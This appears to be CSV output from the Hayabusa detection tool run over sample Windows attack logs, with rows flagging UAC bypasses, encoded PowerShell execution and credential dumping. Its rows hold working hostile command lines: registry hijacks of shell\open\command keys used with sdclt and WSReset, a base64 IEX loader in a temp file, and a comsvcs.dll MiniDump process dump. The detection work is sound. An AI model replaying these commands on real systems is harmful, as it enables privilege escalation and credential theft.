c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx -2019-08-04 18:10:28.612 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: 
NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry 
Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious 
Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript 
Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx -2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP 
Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx -2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: 